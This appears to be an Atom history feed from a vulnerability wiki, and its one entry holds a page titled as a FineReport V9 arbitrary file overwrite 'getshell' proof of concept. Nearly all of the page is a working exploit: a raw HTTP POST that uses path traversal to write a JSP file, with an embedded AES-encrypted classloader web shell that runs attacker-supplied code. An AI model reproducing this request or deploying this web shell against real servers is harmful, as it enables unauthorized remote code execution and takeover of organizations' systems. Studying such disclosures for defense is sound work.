<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%B8%86%E8%BB%9F_V9getshell_FineReport_V9_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E8%93%8B%E6%BC%8F%E6%B4%9E</id>
	<title>帆軟 V9getshell FineReport V9 任意文件覆蓋漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E5%B8%86%E8%BB%9F_V9getshell_FineReport_V9_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E8%93%8B%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%B8%86%E8%BB%9F_V9getshell_FineReport_V9_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E8%93%8B%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T23:50:56Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E5%B8%86%E8%BB%9F_V9getshell_FineReport_V9_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E8%93%8B%E6%BC%8F%E6%B4%9E&amp;diff=1211&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==POC== &lt;pre&gt;  POST  /WebReport/ReportServer?   op=svginit&amp;cmd=design_save_svg&amp;filePath=chartmapsvg/../../../../WebReport/update  .jsp  HTTP/1.1 Host:  192.168.169.138:8080 Us...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%B8%86%E8%BB%9F_V9getshell_FineReport_V9_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E8%93%8B%E6%BC%8F%E6%B4%9E&amp;diff=1211&amp;oldid=prev"/>
		<updated>2021-04-08T04:34:24Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==POC== &amp;lt;pre&amp;gt;  POST  /WebReport/ReportServer?   op=svginit&amp;amp;cmd=design_save_svg&amp;amp;filePath=chartmapsvg/../../../../WebReport/update  .jsp  HTTP/1.1 Host:  192.168.169.138:8080 Us...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
POST  /WebReport/ReportServer?  &lt;br /&gt;
op=svginit&amp;amp;cmd=design_save_svg&amp;amp;filePath=chartmapsvg/../../../../WebReport/update  .jsp  HTTP/1.1&lt;br /&gt;
Host:  192.168.169.138:8080&lt;br /&gt;
User-Agent:  Mozilla/5.0  (Windows  NT  10.0;  Win64;  x64)  AppleWebKit/537.36  (KHTML,  like  Gecko)  &lt;br /&gt;
Chrome/81.0.4044.92  Safari/537.36&lt;br /&gt;
Connection:  close&lt;br /&gt;
Accept-Au:  0c42b2f264071be0507acea1876c74&lt;br /&gt;
Content-Type:  text/xml;charset=UTF-8&lt;br /&gt;
Content-Length:  675 &lt;br /&gt;
{&amp;quot;__CONTENT__&amp;quot;:&amp;quot;&amp;lt;%@page  import=\&amp;quot;java.util.*,javax.crypto.*,javax.crypto.spec.*\&amp;quot;%&amp;gt;&amp;lt;%!class  U  extends  &lt;br /&gt;
ClassLoader{U(ClassLoader  c){super(c);}public  Class  g(byte  []b){return  &lt;br /&gt;
super.defineClass(b,0,b.length);}}%&amp;gt;&amp;lt;%if(request.getParameter(\&amp;quot;pass\&amp;quot;)!=null)  {String  &lt;br /&gt;
k=(\&amp;quot;\&amp;quot;+UUID.randomUUID()).replace(\&amp;quot;-&lt;br /&gt;
\&amp;quot;,\&amp;quot;\&amp;quot;).substring(16);session.putValue(\&amp;quot;u\&amp;quot;,k);out.print(k);return;}Cipher  &lt;br /&gt;
c=Cipher.getInstance(\&amp;quot;AES\&amp;quot;);c.init(2,new  &lt;br /&gt;
SecretKeySpec((session.getValue(\&amp;quot;u\&amp;quot;)+\&amp;quot;\&amp;quot;).getBytes(),\&amp;quot;AES\&amp;quot;));new  &lt;br /&gt;
U(this.getClass().getClassLoader()).g(c.doFinal(new  &lt;br /&gt;
sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta  &lt;br /&gt;
nce().equals(pageContext);%&amp;gt;&amp;quot;,&amp;quot;__CHARSET__&amp;quot;:&amp;quot;UTF-8&amp;quot;}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>